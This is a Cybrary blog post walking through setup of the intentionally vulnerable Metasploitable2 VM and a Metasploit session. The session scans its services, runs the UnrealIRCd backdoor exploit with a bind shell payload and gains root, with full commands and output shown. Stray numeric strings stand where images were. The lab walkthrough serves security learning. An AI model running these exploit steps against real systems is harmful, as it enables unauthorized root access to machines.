Ready to Start Your Career?

Metasploit / Metasploitable2

@vinea 's profile image

By: @vinea

March 21, 2016

Metasploit / Metasploitable2 - CybraryGreetings People - In my first post, I felt like I owed a few details. This time I'll get a little more detailed.   Why write about Metasploitable? Because it's an easy and fun way to learn how to manage the msfconsole. Let's begin... Set parameters and give the name VM :38287985262140805120Followed by:74222099404786638592We got a:25510377044683053959You must enable in system/processor/enable PAE..NX:81645592841011876973Put VM in Bridge adapter mode and it will give you the IP in Advanced settings - "Allow All":54193380600354114538And, finally, we got a our VM:12469124577407244651Log in and type:ifconfig ,.default. The username and password are msfadmin:88597567057560444814Fire up msfconsole :19108633118976112285If you remember in my first post, I was not able to open a session because I didn't want to erase the old hosts. Let s do that now :msf > hosts -dHosts=====address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments-------      ---                ----  -------  ---------  -----  -------  ----  --------*] Deleted 1 hostsok now let s hack that machine..msf > servicesServices========host         port  proto  name         state  info----         ----  -----  ----         -----  ----192.168.1.3  21    tcp    ftp          open   vsftpd 2.3.4192.168.1.3  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0192.168.1.3  23    tcp    telnet       open   Linux telnetd192.168.1.3  25    tcp    smtp         open   Postfix smtpd192.168.1.3  53    tcp    domain       open   ISC BIND 9.4.2192.168.1.3  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2192.168.1.3  111   tcp    rpcbind      open   2 RPC#100000192.168.1.3  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP192.168.1.3  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP192.168.1.3  512   tcp    exec         open   netkit-rsh rexecd192.168.1.3  513   tcp    login        open192.168.1.3  514   tcp    tcpwrapped   open192.168.1.3  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry192.168.1.3  1524  tcp    shell        open   Metasploitable root shell192.168.1.3  2049  tcp    nfs          open   2-4 RPC#100003192.168.1.3  2121  tcp    ccproxy-ftp  open192.168.1.3  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5192.168.1.3  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7192.168.1.3  5900  tcp    vnc          open   VNC protocol 3.3192.168.1.3  6000  tcp    x11          open   access denied192.168.1.3  6667  tcp    irc          open   Unreal ircd192.168.1.3  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3192.168.1.3  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1msf exploit(unreal_ircd_3281_backdoor) > show payloadsCompatible Payloads===================Name                                Disclosure Date  Rank    Description----                                ---------------  ----    -----------cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/generic                                     normal  Unix Command, Generic Command Executioncmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.3RHOST => 192.168.1.3msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_perlPAYLOAD => cmd/unix/bind_perlmsf exploit(unreal_ircd_3281_backdoor) > show optionsModule options (exploit/unix/irc/unreal_ircd_3281_backdoor):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST  192.168.1.3      yes       The target addressRPORT  6667             yes       The target portPayload options (cmd/unix/bind_perl):Name   Current Setting  Required  Description----   ---------------  --------  -----------LPORT  4444             yes       The listen portRHOST  192.168.1.3      no        The target addressExploit target:Id  Name--  ----0   Automatic Targetmsf exploit(unreal_ircd_3281_backdoor) > exploit[*] Started bind handler[*] 192.168.1.3:6667 - Connected to 192.168.1.3:6667...:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead[*] 192.168.1.3:6667 - Sending backdoor command...[*] Command shell session 1 opened (192.168.1.2:55724 -> 192.168.1.3:4444) at 2016-03-20 20:48:08 +0100whoamirootdateSun Mar 20 15:47:23 EDT 2016echo HI CYBRARYHI CYBRARY^CAbort session 1? [y/N]  y[*] 192.168.1.3 - Command shell session 1 closed.  Reason: User exit That's what I wanted to see last time..it looks like Metasploit has some new banners. I'll let you find out on your own.That's it. I hope you liked it. In the end type IP of VM in a browser - in my case 192.168.1.3and have some more fun:51378263597368254900Till next time...bye from @Dabxxl
Schedule Demo